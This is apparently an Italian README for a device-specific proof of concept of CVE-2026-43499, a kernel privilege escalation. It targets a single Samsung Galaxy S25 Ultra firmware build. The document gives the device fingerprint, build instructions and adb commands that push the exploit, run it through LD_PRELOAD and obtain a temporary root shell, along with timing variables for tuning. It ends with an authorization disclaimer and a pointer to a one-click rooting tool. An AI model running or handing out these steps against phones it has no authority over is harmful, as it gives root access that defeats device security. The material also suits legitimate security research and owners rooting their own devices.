
Autonomo CVE-2026-43499 PoC per Galaxy S25 Ultra SM-S938N S938NKSUACZF1
Proof of concept specifico per il dispositivo per CVE-2026-43499 sul Samsung Galaxy S25 Ultra coreano.
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages
Gli offset e i layout delle strutture sono validi solo per il firmware sopra indicato.
Questo porting si basa su:
b850d3bddc74c3328d5fbcc0568d21962b55d949La licenza upstream Apache 2.0 è mantenuta in LICENSE.
pa3q-S938NKSUACZF1.system_unbound_wq specifico del dispositivo.Imposta ANDROID_NDK_HOME sull'NDK Android r29 o una toolchain compatibile:
make -j8
Output:
build/cve-2026-43499
build/cve-2026-43499-root
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"
L'exploit prevede per impostazione predefinita 16 tentativi indipendenti e un ritardo pselect base di 20.000 microsecondi. È possibile sovrascriverli durante la raccolta dei dati di temporizzazione:
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
La sessione root temporanea e le allocazioni mantenute durano fino al riavvio.
Per un'installazione con un clic e il supporto KernelSU, usa Root My Galaxy.
Usa solo su dispositivi di tua proprietà o per i quali hai esplicita autorizzazione al test.